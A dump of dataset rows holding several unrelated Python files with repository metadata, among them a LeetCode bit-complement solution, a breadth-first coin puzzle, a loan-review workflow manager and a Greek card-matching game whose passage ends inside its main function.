| UTF-8 | Python | false | false | 9,958 | py | 12 | sqlalchemy_models.py | 9 | 0.670918 | 0.669612 | 0 | 259 | 37.447876 | 107 |
mgutierrezz/Practice_Problems | 11,347,303,629,543 | b24c2757dbaaff63fe53ee403b53d20ed2a7174a | 6a85de9ee4e251e3c7cd920892e57ca500bc80af | /Number_Complement.py | d62835527d9f8fb683d790bb46b99468e9850586 | [] | no_license | https://github.com/mgutierrezz/Practice_Problems | dd3dbde182636cafbd984e09f75dcfcee76398b9 | e71e0e2e28d444564f4221b209c4cf68d72f6ea3 | refs/heads/master | "2021-08-31T14:31:34.293462" | "2017-12-21T17:50:29" | "2017-12-21T17:50:29" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Number Compliment from @LeetCode.com
------------------------------------
Given a positive integer, output its unsigned complement number.
The complement strategy is to flip the bits of its binary representation.
** The given integer fits within a 32-bit signed integer range.
** No leading 0's
"""
class Solution:
    """LeetCode 476: bitwise complement of a positive integer."""

    def findComplement(self, num):
        """Return *num* with every bit of its binary form flipped.

        :type num: int
        :rtype: int
        """
        bits = bin(num)[2:]
        # Swap every '0' for '1' and vice versa, then read back as binary.
        flipped = bits.translate(str.maketrans("01", "10"))
        return int(flipped, 2)
# Test cases:
#   17 -> 14   (10001 -> 01110)
#   4  -> 3    (100   -> 011)
test = Solution()
for sample in (17, 4):
    print(test.findComplement(sample))
| UTF-8 | Python | false | false | 1,015 | py | 4 | Number_Complement.py | 3 | 0.557635 | 0.525123 | 0 | 33 | 29.757576 | 119 |
SaltieRL/Saltie | 335,007,479,728 | 8703681331d6d3c8bd2b6567f9cb99a628d34230 | a165b266e96c44bb27c6886ce88d88ba381aa20e | /examples/replays/pass_length.py | cb9d6df7e9c48ea9e7909908d42014d69ff1eedc | [
"MIT"
] | permissive | https://github.com/SaltieRL/Saltie | ab616f261f480ebb8d10c32c0a37e046e8188d6f | a491ecfa5c77583ec370a0a378d27865dbd8da63 | refs/heads/master | "2021-06-25T06:35:02.232354" | "2019-01-26T16:50:43" | "2019-01-26T16:50:43" | 111,743,860 | 148 | 32 | MIT | false | "2019-01-26T16:50:44" | "2017-11-22T23:58:21" | "2019-01-26T02:25:01" | "2019-01-26T16:50:43" | 83,377 | 75 | 23 | 22 | Python | false | null | from examples.autoencoder.autoencoder_model import AutoencoderModel
from examples.autoencoder.autoencoder_model_holder import AutoencoderModelHolder
from examples.autoencoder.autoencoder_output_formatter import AutoencoderOutputFormatter
from examples.legacy.legacy_input_formatter import LegacyInputFormatter
from examples.legacy.legacy_normalizer_input_formatter import LegacyNormalizerInputFormatter
from framework.output_formatter.host_output_formatter import HostOutputFormatter
from trainer.parsed_download_trainer import ParsedDownloadTrainer
import matplotlib.pyplot as plt
class PassLengthTrainer(ParsedDownloadTrainer):
    """Collects the frame-length of every pass in parsed replays and plots a histogram."""

    # NOTE(review): class-level list is shared by every instance of this
    # trainer; acceptable while one trainer is used per run.
    hit_lengths = []

    def process_file(self, input_file):
        """Accumulate the frame-length of every pass found in *input_file*."""
        print('Loading file ', input_file)
        steer = input_file.players[0].data.loc[1:100]['steer']
        # Bugfix: '&' binds tighter than comparisons, so the original
        # 'steer > 0 & steer < 100' parsed as a chained comparison and
        # raised ValueError on a pandas Series. Parenthesise both sides.
        if ((steer > 0) & (steer < 100)).sum() > 0:
            print('controller')
        hits = input_file.hits
        # A hit is a pass when its analytics flag says so.
        passes = list(filter(lambda k: k[1].analytics['pass_'], hits.items()))
        print(passes)
        for p in passes:
            p = p[1]
            # Duration of the pass: frames until the next hit.
            length = p.next_hit.frame_number - p.frame_number
            self.hit_lengths.append(length)
        # train on hits

    def finish(self):
        """Show a histogram of all collected pass lengths."""
        plt.hist(self.hit_lengths, bins=50)
        plt.show()
if __name__ == '__main__':
    # Wire up the legacy normalised input pipeline and an autoencoder model
    # holder, then analyse one downloaded replay by its hash id.
    input_formatter = LegacyNormalizerInputFormatter(LegacyInputFormatter())
    output_formatter = HostOutputFormatter(AutoencoderOutputFormatter(input_formatter))
    pl = PassLengthTrainer(AutoencoderModelHolder(AutoencoderModel(compressed_dim=50),
                                                  input_formatter, output_formatter))
    # pl.train_on_files(500)
    pl.train_on_file(name='3E38E50B44101E81F91C40ABC99CA0AB')
| UTF-8 | Python | false | false | 1,826 | py | 60 | pass_length.py | 55 | 0.700986 | 0.680175 | 0 | 42 | 42.47619 | 92 |
Sheriff-AA/7COM1034-AI | 6,983,616,872,766 | 62ef0f0ec6c2d8443ad763e0b307a3e80e560de4 | fd4de865ac652b6b1760a471b690fe7103a3572e | /six_coins.py | 3f53f329e9fe8e0541acb6a058896b9499c38822 | [] | no_license | https://github.com/Sheriff-AA/7COM1034-AI | 17d9e93b96d7ec3ecf4ab9ac69bb2a3424a80832 | c47e5264fd2e340f7cb90417f4a8dc7ec55647bf | refs/heads/master | "2023-04-05T00:53:35.980077" | "2021-04-09T09:18:38" | "2021-04-09T09:18:38" | 355,812,821 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | start_node = ["LC", "LC", "LC", "E", "RC", "RC", "RC"]
goal_node = ["RC", "RC", "RC", "E", "LC", "LC", "LC"]
def cleanup(nodes):
# in-place!!
# remove dummy entries from begin and end of list
# clean from the front
while not nodes[0]:
nodes.pop(0)
while not nodes[-1]:
nodes.pop()
node_d = [1, 2, 1, 2, 1, 2]  # numeric start state: the two coin types alternating
def goal(nodes):
    """True when the six coins are fully sorted into two groups of three."""
    return nodes in ([1, 1, 1, 2, 2, 2], [2, 2, 2, 1, 1, 1])
def successor(node):
    """Yield every legal successor state of *node*.

    A move slides a pair of adjacent coins (both non-empty) rightwards
    into any empty two-slot gap; zero-padding at the end of the list
    stands for free space and is stripped again by ``cleanup``.
    """
    for i in range(len(node) - 1): # stop at second last
        # always move two adjacent coins to the right
        if not node[i] or not node[i + 1]:
            # if one of them empty, try other move
            continue
        # try all moves
        for target in range(i + 1, len(node) + 1):
            # print "move from", i, "to", target
            new_node = node[:] # copy
            doublet = new_node[i:i + 2]
            new_node[i:i + 2] = [0, 0] # empty them
            new_node.extend([0, 0]) # buffer at the end
            if new_node[target:target + 2] == [0, 0]:
                # target area empty
                new_node[target:target + 2] = doublet
                cleanup(new_node) # in-place!!
                if new_node == node:
                    # no-op move: skip states identical to the input
                    continue
                # print "Successor:", node, new_node
                yield new_node
def breadth_first_search(paths):
    """Breadth-first search over coin configurations.

    *paths* is a FIFO work list of paths (lists of states).  Returns the
    first path whose final state satisfies ``goal``, or None when the
    work list is exhausted.

    Rewritten iteratively: the original recursed once per expanded node,
    which can overflow Python's recursion limit on longer searches.
    """
    while paths:
        candidate = paths.pop(0)
        current_state = candidate[-1]
        if goal(current_state):
            return candidate
        for succ in successor(current_state):
            paths.append(candidate + [succ])
    return None
# Run the search from the start state and print each state on the solution
# path.  NOTE(review): assumes a solution exists -- iterating the None
# returned on failure would raise TypeError.
for sol in breadth_first_search([[node_d]]):
    print(sol)
| UTF-8 | Python | false | false | 1,715 | py | 13 | six_coins.py | 13 | 0.516618 | 0.495044 | 0 | 61 | 27.114754 | 69 |
jcallem94/feynrules | 6,562,710,056,276 | cf4db54c709ce2b6fb4e8aa40408d78f39902136 | 99b11ee9f6c707361fe9b5d6bd59d3ac4ff52ceb | /Models/EffLRSMnlo_FilesWithUFO/EffLRSM_NLO/lorentz.py | 8435254c77f66cbd416faff258653fde1752bd15 | [] | no_license | https://github.com/jcallem94/feynrules | 6d53a48570eb3de5ab67c12804ba6e21cbe2d76c | 3e7bd7721b5e202ab87dc9cb9f34711a7e2c0bde | refs/heads/master | "2021-01-21T12:00:28.173918" | "2017-08-31T19:27:04" | "2017-08-31T19:27:04" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # This file was automatically created by FeynRules 2.3.29
# Mathematica version: 10.0 for Linux x86 (64-bit) (September 9, 2014)
# Date: Fri 25 Aug 2017 23:44:54
from object_library import all_lorentz, Lorentz
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
try:
import form_factors as ForFac
except ImportError:
pass
# NOTE(review): the generated statement assigned to the bare literal ``3``,
# which is not a valid Python identifier and made this module unparseable.
# Bound to ``L_3`` here; confirm the intended UFO object name against the
# FeynRules model that generated this file.
L_3 = Lorentz(name = '3',
              spins = [],
              structure = '1')
| UTF-8 | Python | false | false | 441 | py | 9 | lorentz.py | 7 | 0.675737 | 0.605442 | 0 | 17 | 24.882353 | 80 |
syurskyi/Python_Topics | 4,879,082,885,662 | 0cadc9640709c0c2dd78d9014603c391ed1cf5fa | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /045_functions/009_functools_module/examples/13-chain.py | d7e02c6a1ee13cce91b500f4c51f840784da80d8 | [] | no_license | https://github.com/syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | "2023-06-08T19:29:16.214395" | "2023-05-29T17:09:11" | "2023-05-29T17:09:11" | 220,583,118 | 3 | 2 | null | false | "2023-02-16T03:08:10" | "2019-11-09T02:58:47" | "2022-11-03T01:22:28" | "2023-02-16T03:08:09" | 198,671 | 2 | 2 | 33 | Python | false | false | """Пример использования функции chain модуля itertools"""
from itertools import chain
for i in chain(range(2), range(3)):
print(i)
| UTF-8 | Python | false | false | 172 | py | 15,362 | 13-chain.py | 14,734 | 0.717391 | 0.702899 | 0 | 6 | 22 | 58 |
dryabokon/tools | 240,518,200,943 | b137b7db25668d07f9aabbbf6016f63eb960d044 | ab7ca74289b3e3cfa57480e996a297b9c08ae5db | /tools_time_convertor.py | 6d6477fa5c29e60c6935b398ee3961d306a3c2bb | [] | no_license | https://github.com/dryabokon/tools | b4706d9a7dc74376a60a5927ac9e481b20f454a5 | a9964fd24f7e05377cb44696cf1043c34d5e4147 | refs/heads/master | "2023-08-09T07:15:31.721628" | "2023-08-07T11:23:50" | "2023-08-07T11:23:50" | 168,508,474 | 1 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
# ----------------------------------------------------------------------------------------------------------------------
def now_str(format='%Y-%m-%d'):
    """Return the current timestamp rendered with *format* (default ISO date)."""
    return datetime_to_str(pd.Timestamp.now(), format)
# ----------------------------------------------------------------------------------------------------------------------
def str_to_datetime(str_series, format='%Y-%m-%d', errors='ignore'):
    """Parse a string scalar or Series into pandas datetimes.

    Thin wrapper over ``pd.to_datetime``; with ``errors='ignore'`` an
    unparseable input is returned unchanged.
    """
    return pd.to_datetime(str_series, format=format, errors=errors)
# ----------------------------------------------------------------------------------------------------------------------
def datetime_to_str(dt, format='%Y-%m-%d'):
    """Format a datetime scalar or Series as strings using *format*."""
    if isinstance(dt, pd.Series):
        return pd.Series(pd.DatetimeIndex(dt).strftime(format))
    return dt.strftime(format)
# ----------------------------------------------------------------------------------------------------------------------
def add_delta(str_value,str_delta,format='%Y-%m-%d'):
    """Add a pandas offset string (e.g. '1D') to a date.

    NOTE(review): the return type is asymmetric -- a string input comes
    back as a formatted string, anything else (Series/Timestamp) comes
    back as datetime-like data with the delta added; confirm callers
    expect this.
    """
    if isinstance(str_value,str):
        # Wrap the scalar so pd.to_datetime sees a Series, take the single
        # element back out, shift it, then re-format it as a string.
        str_value = pd.Series([str_value])
        res = datetime_to_str(pd.to_datetime(str_value,format=format,errors='ignore').values[0] + pd.Timedelta(str_delta), format)
    else:
        res = pd.to_datetime(str_value, format=format, errors='ignore') + pd.Timedelta(str_delta)
    return res
# ----------------------------------------------------------------------------------------------------------------------
def generate_date_range(dt_start, dt_stop, freq):
    """Build an ascending list of timestamps from *dt_start* to *dt_stop*.

    Steps of ``freq`` (e.g. ``'D'``, ``'12H'``, ``'8D'``) are taken
    backwards from *dt_stop*, so *dt_stop* is always included while
    *dt_start* only appears when the span is an exact multiple of the
    step.  When *dt_start* is a string the result is returned as a Series
    of formatted strings; otherwise as a list of timestamps.

    Bugfix: the original leading-digit check listed '0'-'7' and '9' but
    omitted '8', so a frequency such as '8D' was silently turned into
    '18D'.  Use ``str.isdigit`` instead of a hand-written digit list.
    """
    need_postprocess_to_str = False
    if isinstance(dt_start, str):
        dt_start = str_to_datetime(dt_start)
        need_postprocess_to_str = True

    # A leading digit means the frequency already carries a count.
    delta = freq if freq[0].isdigit() else '1' + freq

    dates = []
    now = dt_stop if not isinstance(dt_stop, str) else str_to_datetime(dt_stop)
    # dt_start was converted above if it arrived as a string, so it can be
    # compared directly here.
    while now >= dt_start:
        dates.append(now)
        now = now - pd.Timedelta(delta)

    dates = dates[::-1]
    if need_postprocess_to_str:
        dates = datetime_to_str(pd.Series(dates))
    return dates
# ----------------------------------------------------------------------------------------------------------------------
def pretify_timedelta(td):
    """Format an iterable of second counts as 'HH:MM:SS:mmm' strings."""
    formatted = []
    for total_seconds in td:
        hours, remainder = divmod(total_seconds, 3600)
        minutes, seconds = divmod(remainder, 60)
        millis = 1000 * (total_seconds % 1)
        formatted.append('%02d:%02d:%02d:%03d' % (hours, minutes, seconds, millis))
    return formatted
# ----------------------------------------------------------------------------------------------------------------------
| UTF-8 | Python | false | false | 2,765 | py | 112 | tools_time_convertor.py | 111 | 0.419168 | 0.400723 | 0 | 65 | 41.538462 | 130 |
slukas111/custom_user | 10,325,101,413,038 | a5a6609077c1210bcdbe829d2641e8c409a4afab | b34cef759d791dce0331b85c9582703b2e099e73 | /sashauser/forms.py | a48e4626d40380fa1b1a870fd464e9fcdd945045 | [] | no_license | https://github.com/slukas111/custom_user | 9a552c4df416799b2acaa7fd6583d6208baff578 | 30d4a6e01f93ba12600631ed99b1df1296aa5d75 | refs/heads/master | "2023-07-31T12:36:56.389065" | "2020-07-03T22:17:12" | "2020-07-03T22:17:12" | 268,570,838 | 0 | 0 | null | false | "2021-09-22T19:08:25" | "2020-06-01T16:13:21" | "2020-07-03T22:17:24" | "2021-09-22T19:08:23" | 11 | 0 | 0 | 1 | Python | false | false | from django import forms
from .models import CustomUser
class LoginForm(forms.Form):
username = forms.CharField(max_length=50)
password = forms.CharField(max_length=32, widget=forms.PasswordInput)
class SignUpForm(forms.Form):
username = forms.CharField(max_length=50)
display_name = forms.CharField(max_length=50)
password = forms.CharField(max_length=32, widget=forms.PasswordInput) | UTF-8 | Python | false | false | 407 | py | 4 | forms.py | 3 | 0.761671 | 0.737101 | 0 | 12 | 33 | 73 |
leolinf/flask-demo | 6,554,120,094,269 | 559a625e5bc545070efb1f7e1839880307ff65ca | b1e909985a022e925347200c7e62c56e85ec3325 | /risk/app/review/managers.py | b58cacdfa962d8c380f9e9ed64bbcaad00f946f0 | [] | no_license | https://github.com/leolinf/flask-demo | 221d4b1a4b834b148ebc8d8ef698e38b7dd86b06 | c882d5bf2f7a337c08a9d60b5062324e512c0a3c | refs/heads/master | "2022-12-09T18:51:16.477097" | "2019-03-25T10:27:00" | "2019-03-25T10:27:00" | 118,107,203 | 1 | 0 | null | false | "2022-12-08T00:46:14" | "2018-01-19T09:46:31" | "2019-03-25T10:27:13" | "2022-12-08T00:46:13" | 618 | 1 | 0 | 26 | Python | false | false | # -*- coding: utf-8 -*-
import datetime
from ..models import InputApply
from ..constants import ApproveStatus, Code, ViewStatus, ViewLogTemp, InputApplyStatus, Status, LocalState
from ..config import Config
from ..databases import session_scope
import json
from ..models.sqlas import ReviewLog
from app.credit.utils import check_whether_self
class ReviewManager(object):
    """Drives the three-step approval workflow for an ``InputApply``.

    Handles locking/unlocking of applications, status transitions between
    review steps, and persistence of review-log entries.  All timestamps
    come from ``self.now``, captured once at construction.
    """

    def __init__(self, session, *args, **kwargs):
        # session: database session used for all queries/writes.
        self.session = session
        self.now = datetime.datetime.now()
        # Set by review() to the last application it processed.
        self.review_instance = None

    def _get_status_after_review(self, previous_status, steps, is_pass=False):
        """Return the approval status that follows a review at step 1/2/3.

        Step 3 is terminal: PASS or DENY depending on *is_pass*.  Any
        step/status combination outside the expected sequence leaves the
        status unchanged.
        """
        if steps == 1 and previous_status in [ApproveStatus.FIRST_DOING, None]:
            status = ApproveStatus.SECOND_DOING
        elif steps == 2 and previous_status == ApproveStatus.SECOND_DOING:
            status = ApproveStatus.THIRD_DOING
        elif steps == 3 and previous_status == ApproveStatus.THIRD_DOING:
            status = ApproveStatus.PASS if is_pass else ApproveStatus.DENY
        else:
            status = previous_status
        return status

    def _get_status_after_locked(self, previous_status):
        """Return the in-progress status an application enters when locked."""
        if previous_status in [ApproveStatus.WAITING, None]:
            status = ApproveStatus.FIRST_DOING
        elif previous_status == ApproveStatus.FIRST_DONE:
            status = ApproveStatus.SECOND_DOING
        elif previous_status == ApproveStatus.SECOND_DONE:
            status = ApproveStatus.THIRD_DOING
        else:
            status = previous_status
        return status

    def _record_view(self, review, steps, params, prestatus):
        """Store the operator's input on *review* and add a ReviewLog row.

        The review's status is temporarily reset to *prestatus* so the
        template-number lookup sees the pre-review state, then restored.
        """
        # Remember the new status, then restore the pre-review one for the
        # template-number computation below.
        new_status = review.approve_status
        review.approve_status = prestatus
        operate_json = json.dumps(params)
        if steps == ViewStatus.VIEW_FIRST:
            review.first_view = operate_json
        elif steps == ViewStatus.VIEW_SECOND:
            review.second_view = operate_json
        elif steps == ViewStatus.VIEW_THIRD:
            review.third_view = operate_json
        tem_num = self.review_log_get_template_status(review, steps, params.get("isFinalPass", None))
        review.approve_status = new_status
        # -2 / -3 mean a roll-back of the final decision: clear the stored
        # third-review payload and log with a fixed template number.
        if tem_num == -3 or tem_num == -2:
            review.third_view = ""
        current_user = review.lock_user
        if tem_num == -2:
            view_log_obj = ReviewLog(
                params="",
                user_id=current_user.id,
                # username=current_user.username,
                create_time=self.now,
                input_apply_id=review.id,
                template_number=7
            )
        elif tem_num == -3:
            view_log_obj = ReviewLog(
                params="",
                user_id=current_user.id,
                # username=current_user.username,
                create_time=self.now,
                input_apply_id=review.id,
                template_number=5
            )
        else:
            view_log_obj = ReviewLog(
                params=operate_json,
                user_id=current_user.id,
                # username=current_user.username,
                create_time=self.now,
                input_apply_id=review.id,
                template_number=tem_num
            )
        # NOTE(review): both branches currently do the same thing; the
        # commented-out session handling differs and was left disabled.
        if steps != 3:
            # with session_scope(self.session) as session:
            #     session.add(review)
            self.session.add(view_log_obj)
        else:
            # self.session.add(review)
            self.session.add(view_log_obj)

    def check_is_locked(self, search_id, current_user):
        """Lock-state summary for the frontend.

        Returns ``Code.SEARCH_NOT_EXIST`` when the application is missing,
        otherwise a dict with ``isBlocked``, ``isTimeout``, ``status`` and
        the locking ``username``.  A lock held by another user blocks; a
        lock older than ``Config.LOCK_TIME`` seconds counts as timed out.
        """
        now = self.now
        review = self.session.query(InputApply).get(search_id)
        if not review:
            return Code.SEARCH_NOT_EXIST
        if review.local_state == LocalState.WEB:
            # Web-originated applications are never editable here.
            lock = 1
            timeout = 0
            username = ''
        elif review.is_locked and review.lock_user_id == current_user.id:
            # Locked by the current user: not blocked.
            lock = 0
            username = current_user.username
            timeout = 0
        elif review.is_locked and review.lock_user_id != current_user.id:
            # Locked by someone else: blocked.
            lock = 1
            timeout = 0
            username = review.lock_user.username
        elif not review.is_locked and review.lock_user_id == current_user.id and review.lock_time + datetime.timedelta(seconds=Config.LOCK_TIME) < now:
            # Own previous lock, already expired.
            lock = 0
            timeout = 1
            username = current_user.username
        elif not review.is_locked and review.lock_user_id == current_user.id and review.lock_time + datetime.timedelta(seconds=Config.LOCK_TIME) >= now:
            # Own previous lock, still within the timeout window.
            lock = 0
            timeout = 0
            username = current_user.username
        elif not review.is_locked and review.lock_user_id and review.lock_user_id != current_user.id:
            # Someone else's released lock: report as timed out.
            lock = 0
            timeout = 1
            username = review.lock_user.username
        else:
            # Never locked.
            lock = 0
            timeout = 0
            username = ''
        res = {
            'isBlocked': lock,
            'isTimeout': timeout,
            'status': review.approve_status,
            'username': username,
        }
        return res

    def add_lock(self, search_id, current_user):
        """Try to lock application *search_id* for *current_user*.

        Returns a ``Code`` constant: SUCCESS on (re-)acquiring the lock,
        SEARCH_NOT_EXIST / NOT_ALLOWED / UNABLE_LOCK otherwise.  Acquiring
        the lock also advances the approval status to the matching
        in-progress state.
        """
        now = self.now
        credit = self.session.query(InputApply).get(search_id)
        if not credit:
            return Code.SEARCH_NOT_EXIST
        if not check_whether_self(credit):
            return Code.NOT_ALLOWED
        if credit.local_state == LocalState.WEB:
            return Code.NOT_ALLOWED
        next_status = self._get_status_after_locked(credit.approve_status)
        # Free, or already held by this user: (re)take it.
        if not credit.is_locked or credit.lock_user_id == current_user.id:
            with session_scope(self.session) as session:
                credit.is_locked = 1
                credit.lock_time = now
                credit.lock_user_id = current_user.id
                credit.approve_status = next_status
                session.add(credit)
            return Code.SUCCESS
        else:
            return Code.UNABLE_LOCK

    def review(self, search_id, current_user, steps, params, is_pass=None):
        """Perform one review step.

        :param steps: review step, 1/2/3 (3 is the final decision)
        :returns: an error ``Code`` on failure, or ``(Code.SUCCESS,
            next_status)`` on success.
        """
        now = self.now
        input_apply = self.session.query(InputApply).get(search_id)
        if not input_apply:
            return Code.SEARCH_NOT_EXIST
        if not check_whether_self(input_apply):
            return Code.NOT_ALLOWED
        # NOTE(review): magic number -- presumably LocalState.WEB; confirm.
        if input_apply.local_state == 2:
            return Code.NOT_ALLOWED
        review = input_apply
        # Locked by somebody else.
        if review.is_locked and review.lock_user_id != current_user.id:
            return Code.ALREADY_LOCKED
        # Not locked at all: the caller must lock before reviewing.
        elif not review.is_locked:
            return Code.NOT_LOCKED
        previous_status = review.approve_status
        next_status = self._get_status_after_review(previous_status, steps, is_pass)
        # The final step releases the lock; earlier steps keep it.
        if steps == 3:
            review.is_locked = 0
        else:
            review.is_locked = 1
        review.lock_time = now
        review.lock_user_id = current_user.id
        review.approve_status = next_status
        review.approve_time = now
        # NOTE(review): the two assignments below duplicate the two above;
        # kept verbatim (harmless) pending confirmation.
        review.approve_status = next_status
        review.approve_time = now
        self._record_view(review, steps, params, previous_status)
        if next_status == ApproveStatus.DENY:
            review.status = Status.APPROVEDENIED
            review.content = params.get("msg", "")
        if next_status == ApproveStatus.PASS:
            review.status = Status.WAITMERCH
            review.content = params.get("msg", "")
        self.session.add(review)
        self.review_instance = review
        return Code.SUCCESS, next_status

    def review_log_get_template_status(self, sea_obj, stage, pass__=None):
        """Map a review stage + current status to a log template number.

        Returns 1-4 for forward transitions, -2/-3 for a roll-back of a
        previously passed/denied final review, and -1 when nothing changed.
        """
        ret = -1  # -1 means the final status did not change
        if stage == ViewStatus.VIEW_BACK:
            if sea_obj.third_view:
                if json.loads(sea_obj.third_view).get('isFinalPass') == 1:
                    return -2
                else:
                    return -3
        elif stage == ViewStatus.VIEW_FIRST:
            if sea_obj.approve_status == ApproveStatus.FIRST_DOING:
                ret = 1  # from "not yet first-reviewed" to "first-reviewed"
        elif stage == ViewStatus.VIEW_SECOND:
            if sea_obj.approve_status == ApproveStatus.SECOND_DOING:
                ret = 2  # from "first-reviewed" to "second-reviewed"
        elif stage == ViewStatus.VIEW_THIRD:
            # pass__ may arrive as int or string from the request payload.
            if pass__ == 1 or pass__ == '1':
                if sea_obj.approve_status == ApproveStatus.THIRD_DOING:
                    ret = 3
            else:
                if sea_obj.approve_status == ApproveStatus.THIRD_DOING:
                    ret = 4
        return ret

    @staticmethod
    def get_status_after_unlock(previous_status):
        """Return the status to fall back to when a lock is released."""
        if previous_status == ApproveStatus.FIRST_DOING:
            status = ApproveStatus.WAITING
        elif previous_status == ApproveStatus.SECOND_DOING:
            status = ApproveStatus.FIRST_DONE
        elif previous_status == ApproveStatus.THIRD_DOING:
            status = ApproveStatus.SECOND_DONE
        else:
            status = previous_status
        return status
| UTF-8 | Python | false | false | 9,369 | py | 212 | managers.py | 183 | 0.564981 | 0.560305 | 0 | 277 | 32.194946 | 152 |
TeoTse/Python-Scripts | 446,676,627,133 | a5c25be1d5e56e837ca70478635891a1529aae52 | a34489d2bd41e19ecd6ef158d283c9d8720de3ed | /Game/MatchingGame.py | 19b54fad3efa5aee6b0162f00725e27146573492 | [] | no_license | https://github.com/TeoTse/Python-Scripts | b7fd64d69b181da14647784b62267928b0f02566 | c18de8f57dee1db6100877d28e17ff12ba72c329 | refs/heads/main | "2023-04-08T05:33:34.440286" | "2021-04-04T20:56:03" | "2021-04-04T20:56:03" | 354,644,371 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import random
#Build the full deck for a given difficulty size: 16 (easy), 40 (medium) or 52 (hard)
def CardSet(n, AllCards):
    """Append the n cards of the chosen level to AllCards; unknown sizes add nothing.

    Point values: A counts 1, J/Q/K count 10, number cards count their face value.
    """
    if n == 16:
        ranks = ['10', 'J', 'Q', 'K']
    elif n == 40:
        ranks = ['A', '2', '3', '4', '5', '6', '7', '8', '9', '10']
    elif n == 52:
        ranks = ['A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']
    else:
        return
    for suit in ["♥", "♦", "♠", "♣"]:
        for rank in ranks:
            if rank == 'A':
                points = 1
            elif rank in ('J', 'Q', 'K'):
                points = 10
            else:
                points = int(rank)
            AllCards.append(Card(suit, points, rank + suit, False))
#Set the open/closed state of the first n cards in one go (initial reveal / hide)
def SetStateAll(state, AllCards, n):
    """Apply the given open (True) / closed (False) state to cards 0..n-1."""
    for index in range(n):
        AllCards[index].SetStat(state)
#Draw the 4x4 board used by the easy level
def Easy(AllCards):
    """Print the easy board: closed cards show as X, open cards show their face.

    Improvement: the original repeated the same row-printing code four times;
    the rows are now rendered by one loop with identical output and spacing.
    """
    print("   1   2   3   4")
    for row in range(4):
        print(str(row + 1) + " ", end="")
        for col in range(4):
            card = AllCards[row * 4 + col]
            if card.GetStat() == False:
                print("X  ", end="")
            else:
                # print() inserts a space between the face and the padding.
                print(card.GetDesc(), "  ", end="")
        print("")
        print("")
#Draw the 4x10 board used by the medium level
def Medium(AllCards):
    """Print the medium board (4 rows x 10 columns); X marks a closed card.

    Improvement: four duplicated row-printing sections collapsed into one loop;
    the printed output is unchanged.
    """
    print("   1   2   3   4   5   6   7   8   9   10")
    for row in range(4):
        print(str(row + 1) + " ", end="")
        for col in range(10):
            card = AllCards[row * 10 + col]
            if card.GetStat() == False:
                print("X  ", end="")
            else:
                print(card.GetDesc(), "  ", end="")
        print("")
        print("")
#Draw the 4x13 board used by the hard level
def Hard(AllCards):
    """Print the hard board (4 rows x 13 columns); X marks a closed card.

    Improvement: four duplicated row-printing sections collapsed into one loop;
    the printed output is unchanged.
    """
    print("   1   2   3   4   5   6   7   8   9   10  11  12  13")
    for row in range(4):
        print(str(row + 1) + " ", end="")
        for col in range(13):
            card = AllCards[row * 13 + col]
            if card.GetStat() == False:
                print("X  ", end="")
            else:
                print(card.GetDesc(), "  ", end="")
        print("")
        print("")
#Card-selection input: shared parser/validator used by FirstCard and SecondCard
def _read_card(AllCards, Player, Level, CardsOpen, which):
    """Ask Player for "row column", validate it for the level's board, open the card.

    On success the card is opened, its flat index is appended to CardsOpen and
    True is returned; on any invalid input an error message is printed and
    False is returned so the caller can re-prompt.

    Rewritten from two near-identical ~70-line character-by-character parsers.
    Fixes two defects of the original: an IndexError when only one number was
    entered (off-by-one bound check on ``y[i+1]``), and an unbound-variable
    NameError in SecondCard's hard-level validation path. As part of the
    cleanup, every rejected input now prints the error message (the original
    silently returned False on some malformed inputs).
    """
    columns = {1: 4, 2: 10, 3: 13}[Level]
    answer = input("Παίκτη " + str(Player) + ": Δώσε γραμμή και στήλη " + which + " κάρτας (πχ 1 10):")
    parts = answer.split()
    if len(parts) != 2 or not parts[0].isdecimal() or not parts[1].isdecimal():
        print("Λάθος στοιχεία επιλογής κάρτας")
        return False
    line = int(parts[0])
    column = int(parts[1])
    if not (1 <= line <= 4) or not (1 <= column <= columns):
        print("Λάθος στοιχεία επιλογής κάρτας")
        return False
    index = (line - 1) * columns + (column - 1)
    if AllCards[index].GetStat() == False:
        AllCards[index].SetStat(True)
        CardsOpen.append(index)
        return True
    print("Η κάρτα είναι ήδη ανοικτή, δοκιμάστε ξανά")
    return False

#Prompt for and open the first card of the turn
def FirstCard(AllCards, Player, Level, CardsOpen):
    """Read and validate the first pick; True when a closed card was opened."""
    return _read_card(AllCards, Player, Level, CardsOpen, "πρώτης")

#Prompt for and open the second card of the turn
def SecondCard(AllCards, Player, Level, CardsOpen):
    """Read and validate the second pick; True when a closed card was opened."""
    return _read_card(AllCards, Player, Level, CardsOpen, "δεύτερης")
#Run a single player's turn: pick two cards, redrawing the board after each pick
def Turn(AllCards, Player, Level, CardsOpen):
    """Handle one turn for Player.

    Returns True once both cards were opened (the second pick is retried until
    it succeeds); returns False when the first pick was rejected.
    """
    def redraw():
        if Level == 1:
            Easy(AllCards)
        elif Level == 2:
            Medium(AllCards)
        else:
            Hard(AllCards)

    if not FirstCard(AllCards, Player, Level, CardsOpen):
        return False
    redraw()
    while not SecondCard(AllCards, Player, Level, CardsOpen):
        pass
    redraw()
    return True
#The game is over once every card on the board has been matched (left open)
def CheckGame(AllCards):
    """Return True when every card is open (game over), False otherwise."""
    for card in AllCards:
        if card.GetStat() == False:
            return False
    return True
#Announce the winner, or a tie when the best score is shared by several players
def GameWinner(PlayerPoints):
    """Print the winning player's number, or a tie message when the top score is shared."""
    best = 0
    best_index = -1
    tie = False
    for index, points in enumerate(PlayerPoints):
        if points > best:
            best = points
            best_index = index
            tie = False
        elif points == best:
            tie = True
    if tie == False:
        print("Νίκησε ο παίχτης " + str(best_index + 1))
    else:
        print("Υπάρχει ισοβαθμία μεταξύ παιχτών")
#Entry point: read player count and difficulty, then run the shared game loop
def main():
    """Read the number of players and the difficulty, then play the game.

    Improvement: the original repeated an almost identical ~40-line game loop
    once per difficulty; the loop now lives in _run_game and only the deck
    size and board-drawing function differ per level.
    """
